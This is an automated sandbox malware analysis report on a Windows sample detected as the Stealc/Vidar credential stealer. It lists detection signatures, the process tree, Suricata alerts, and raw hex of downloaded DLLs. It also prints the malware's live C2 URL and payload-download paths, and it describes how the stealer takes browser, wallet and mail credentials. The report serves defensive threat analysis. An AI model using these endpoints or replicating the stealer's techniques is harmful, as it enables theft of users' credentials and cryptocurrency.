Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
random(1).exe

Overview

General Information

Sample name:random(1).exe
Analysis ID:1629904
MD5:1e95dc10fef7079a5d3fa793732a7cce
SHA1:8e9ccb511e76c921c6ddf2a2615a2e3c86ea4113
SHA256:81ac77037e15e56a6cdc0ba7e2af38e3e5a9f7a353054276c763e57d03db5ec1
Tags:185-215-113-209exeuser-JAMESWT_MHT
Infos:

Detection

Stealc, Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • random(1).exe (PID: 7600 cmdline: "C:\Users\user\Desktop\random(1).exe" MD5: 1E95DC10FEF7079A5D3FA793732A7CCE)
    • chrome.exe (PID: 7828 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 8060 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 --field-trial-handle=2280,i,4646147605048899530,4272269093725665048,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2013235084.00000000008BD000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.1728661894.0000000004BE0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2013442010.0000000000C81000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          00000000.00000002.2013235084.0000000000913000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Process Memory Space: random(1).exe PID: 7600JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              Click to see the 3 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Browser Started with Remote Debugging
              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\random(1).exe", ParentImage: C:\Users\user\Desktop\random(1).exe, ParentProcessId: 7600, ParentProcessName: random(1).exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 7828, ProcessName: chrome.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:19.994526+010020442451Malware Command and Control Activity Detected185.215.113.11580192.168.2.449733TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:19.951807+010020442441Malware Command and Control Activity Detected192.168.2.449733185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:20.213690+010020442461Malware Command and Control Activity Detected192.168.2.449733185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:23.114853+010020442481Malware Command and Control Activity Detected192.168.2.449733185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:20.221069+010020442471Malware Command and Control Activity Detected185.215.113.11580192.168.2.449733TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:19.684968+010020442431Malware Command and Control Activity Detected192.168.2.449733185.215.113.11580TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-03-05T09:25:23.711035+010028033043Unknown Traffic192.168.2.449733185.215.113.11580TCP
              2025-03-05T09:25:37.225833+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP
              2025-03-05T09:25:38.551142+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP
              2025-03-05T09:25:39.190525+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP
              2025-03-05T09:25:39.730719+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP
              2025-03-05T09:25:41.399367+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP
              2025-03-05T09:25:41.784440+010028033043Unknown Traffic192.168.2.449759185.215.113.11580TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: random(1).exeAvira: detected
              Antivirus detection for URL or domain
              Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllnAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpAAFBGDBKJJJKFIIIJAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllcAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllBNAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/nss3.dllwAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllbNAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dllsAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phppAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phplAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phprowserAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll;Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpCAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phperAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpveAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpOAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpWAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/mozglue.dlleAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/softokn3.dllAAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/freebl3.dllOAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/vcruntime140.dll.Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.phpR0Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/c4becf79229cb002.php%0Avira URL Cloud: Label: malware
              Source: http://185.215.113.115/YAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/msvcp140.dllzNAvira URL Cloud: Label: malware
              Source: http://185.215.113.115/68b591d6548ec281/sqlite3.dll=Avira URL Cloud: Label: malware
              Found malware configuration
              Source: random(1).exe.7600.0.memstrminMalware Configuration Extractor: StealC {"C2 url": "185.215.113.115/c4becf79229cb002.php", "Botnet": "reno"}
              Multi AV Scanner detection for submitted file
              Source: random(1).exeReversingLabs: Detection: 78%
              Source: random(1).exeVirustotal: Detection: 77%Perma Link
              Joe Sandbox ML detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5EA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,0_2_6C5EA9A0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E4440 PK11_PrivDecrypt,0_2_6C5E4440
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5B4420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,0_2_6C5B4420
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E44C0 PK11_PubEncrypt,0_2_6C5E44C0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C6325B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,0_2_6C6325B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5EA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,0_2_6C5EA650
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C8670 PK11_ExportEncryptedPrivKeyInfo,0_2_6C5C8670
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5CE6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,0_2_6C5CE6E0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60A730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,0_2_6C60A730
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C610180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,0_2_6C610180
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E43B0 PK11_PubEncryptPKCS1,PR_SetError,0_2_6C5E43B0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C607C00 SEC_PKCS12DecoderImportBags,PR_SetError,NSS_OptionGet,CERT_DestroyCertificate,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECKEY_DestroyPublicKey,SECITEM_ZfreeItem_Util,PR_SetError,SECOID_FindOID_Util,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,SECOID_GetAlgorithmTag_Util,SECITEM_CopyItem_Util,PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECITEM_ZfreeItem_Util,SECKEY_DestroyPublicKey,PK11_ImportPublicKey,SECOID_FindOID_Util,0_2_6C607C00
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5C7D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,0_2_6C5C7D60
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60BD30 SEC_PKCS12IsEncryptionAllowed,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,NSS_GetAlgorithmPolicy,0_2_6C60BD30
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C609EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,0_2_6C609EC0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E3FF0 PK11_PrivDecryptPKCS1,0_2_6C5E3FF0
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,0_2_6C5E3850
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C5E9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,0_2_6C5E9840
              Source: C:\Users\user\Desktop\random(1).exeCode function: 0_2_6C60DA40 SEC_PKCS7ContentIsEncrypted,0_2_6C60DA40
              Source: random(1).exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49837 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49835 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49839 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 150.171.27.10:443 -> 192.168.2.4:49841 version: TLS 1.2
              Source: Binary string: mozglue.pdbP source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
              Source: Binary string: nss3.pdb@ source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
              Source: Binary string: nss3.pdb source: random(1).exe, 00000000.00000002.2028728035.000000006C6BF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
              Source: Binary string: mozglue.pdb source: random(1).exe, 00000000.00000002.2028941439.000000006F8ED000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
              Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\random(1).exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49733 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.115:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.4:49733 -> 185.215.113.115:80
              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.115:80 -> 192.168.2.4:49733
              Source: Network trafficSuricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.4:49733 -> 185.215.113.115:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: 185.215.113.115/c4becf79229cb002.php
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:23 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 05 Mar 2025 08:25:37 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 